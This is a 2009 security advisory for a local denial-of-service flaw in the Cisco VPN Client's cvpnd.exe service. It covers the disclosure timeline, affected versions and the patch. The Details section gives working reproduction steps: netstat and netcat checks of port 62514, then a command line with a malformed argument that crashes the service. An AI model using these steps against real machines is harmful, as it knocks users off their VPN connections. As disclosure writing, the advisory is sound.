Mapa web

Services

Products

I+D & Advisories

News

Customers

Partners

Employ

Advisories

SYBSEC-ADV17: Cisco VPN Client 0day Denial Of Service

Title	Cisco VPN Client 0day Denial Of Service
ID	SYBSEC-ADV17
Severity	Medium - Remote Denial Of Service (DoS)
History	06/03/2009 The vulnerability was discovered. 07/03/2009 Exploit/PoC code was developed (private). 09/03/2009 Cisco PSIRT was notified about the issue. 11/03/2009 Vendor response asking for details of the testing environment. 12/03/2009 Test scenario explained and sent a PDF document with details. 16/03/2009 Developers/PSIRT confirmed the vulnerability. 19/03/2009 New test scenarios around new versions (CISCO VPN client). 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279. 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276. 15/04/2009 New Advisory release (private). 16/04/2009 New PSIRT feedback no ETA avaiable. 23/04/2009 The development team working the fix. 01/05/2009 The development team estimated one month to fix. 01/06/2009 New PSIRT feedback, no ETA available. 29/06/2009 The development team estimated one month to fix. 28/07/2009 The development team working on maitenance release. 28/07/2009 The development team estimated one month to fix. 02/09/2009 New vulnerabilities found on CISCO VPN client. 02/09/2009 The development team can not publish the new version 5.0.6. 02/09/2009 The development team working on maitenance release. 02/09/2009 The development team estimated one month to fix. 10/09/2009 The BETA program should be finished by the end of Oct and the client posted next month. 07/10/2009 The development team estimated one month to fix. 11/11/2009 New PSIRT feedback RNA avaiable. 19/11/2009 The vulnerability goes public and PSIRT is informed. 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
Scope	Application Denial of Service
Platforms	Cisco VPN client version 5.0.03.0560 Cisco VPN client Version 5.0.04.0300 Cisco VPN client Version 5.0.05.0290 Cisco VPN client Version 4.8.02.0010
Author	Alex Hernandez aka alt3kx <ahernandez [at] sybsecurity [dot] com>
URL	http://www.sybsecurity.com/advisors/SYBSEC-ADV17-Cisco_VPN_0day_Client_Denial_Of_Service
Release	Public
Overview	The Cisco Virtual Private Network (VPN) Client establishes an encrypted tunnel between a local system and a Cisco VPN concentrator. The tunnel provides data integrity and confidentiality, allowing users a secure connection to a corporate network otherwise from a public non-trusted network.
Affected versions	The vulnerability has been reported in versions CISCO VPN Client Cisco VPN client version 5.0.03.0560 Cisco VPN client Version 5.0.04.0300 Cisco VPN client Version 5.0.05.0290 Cisco VPN client Version 4.8.02.0010
Description	A Denial of Service (DOS) attack on the win32 VPN client platform, can be exploited locally and collapse the VPN client through the "cvpnd.exe" service running with "SYSTEM" priviledges. Requisites: Test default ports: PORT STATE SERVICE 62514/tcp open cvpnd 62514/udp open cvpnd
Workaround	Upgrade the CISCO VPN client version from: *BugToolKit http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276 *Intellishield Alert http://tools.cisco.com/security/center/viewAlert.x?alertId=19445 The vendor has released a patch to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Acknowledgments	This vulnerability have been found and researched by: - Alex Hernandez aka alt3kx <ahernandez [at] sybsecurity [dot] com>
References	* Cisco: http://www.cisco.com * SYB Security: http://www.sybsecurity.com
Details	"A denial of service attack to the VPN client on the win32 platform can be exploited locally causing the service to collapse through the execution of the cvpnd.exe binary. By default, the cvpnd.exe gets executed with "SYSTEM" priviledges on the localhost, an intruder, previously signed in to the victim's systemlocally or remote can execute this binary accomplishing a denial of service. This service is found listening on TCP/UDP port 62514 and is coincidentally in charge of setting up and breaking down the encrypted tunnels between the client and the VPN concentrator. Unnamed window, item 9 PID=636 Name=cvpnd Service=CVPND Listening=TCP: 62514 62514 UDP: 62514 <- Open ports Path=C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe The host victim executes the VPN client normally, ready to establish an encrypted tunnel to the concentrator. This automatically establishesthe "cvpnd.exe" service listening on TCP/UDP ports 62514. C:\>netstat -n Active Connections Proto Local Address Foreign Address State TCP 127.0.0.1:1040 127.0.0.1:62514 ESTABLISHED TCP 127.0.0.1:62514 127.0.0.1:1040 ESTABLISHED <-here We confirm the locally established connection with netcat.exe to port 62514: C:\>nc -vvn 127.0.0.1 62514 (UNKNOWN) [127.0.0.1] 62514 (?) open The intruder penetrates without priviledge to the local machine running the Cisco VPN Client to the point it reaches the full path of "cvpnd.exe" C:\Program Files\Cisco Systems\VPN Client>dir *.exe Volume in drive C has no label. Volume Serial Number is DC13-87F8 Directory of C:\Program Files\Cisco Systems\VPN Client 6/19/2008 06:08p 246,576 autoinstall.exe 6/19/2008 06:08p 262,960 autoinstallgui.exe 6/19/2008 06:08p 328,496 autoupdate.exe 6/19/2008 06:01p 1,028,219 cisco_cert_mgr.exe 6/19/2008 06:08p 1,528,608 cvpnd.exe <- here 6/19/2008 06:08p 176,944 ipsecdialer.exe 6/19/2008 06:08p 172,840 IPSecLog.exe 6/19/2008 06:08p 230,176 ppptool.exe 6/19/2008 06:08p 217,888 SetMTU.exe 6/19/2008 06:08p 86,824 VAInstaller.exe 6/19/2008 06:08p 267,040 vpnclient.exe 6/19/2008 06:08p 1,544,984 vpngui.exe 12 File(s) 6,091,555 bytes 0 Dir(s) 7,511,080,960 bytes free Through the execution of the "cvpnd.exe" command the attacker injects malformed characters: C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEE The previously established ports have collapsed in a satisfactory form, and now we observe the connection denied through netcat: C:\>nc -vvn 127.0.0.1 62514 (UNKNOWN) [127.0.0.1] 62514 (?): connection refused sent 0, rcvd 0: NOTSOCK "
Exploit tool	sybsec-adv17.txt